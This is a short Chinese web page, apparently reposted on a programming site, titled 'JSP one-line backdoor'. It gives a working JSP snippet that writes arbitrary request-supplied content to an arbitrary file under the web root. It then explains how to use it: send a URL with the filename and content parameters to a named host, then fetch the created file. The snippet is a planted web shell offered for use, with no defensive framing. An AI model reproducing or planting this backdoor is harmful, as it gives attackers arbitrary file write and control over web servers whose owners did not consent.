首页 > 编程 > JSP > 正文

JSP一句话后门

2020-07-27 21:44:37
字体:
来源:转载
供稿:网友
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld

然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld 
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表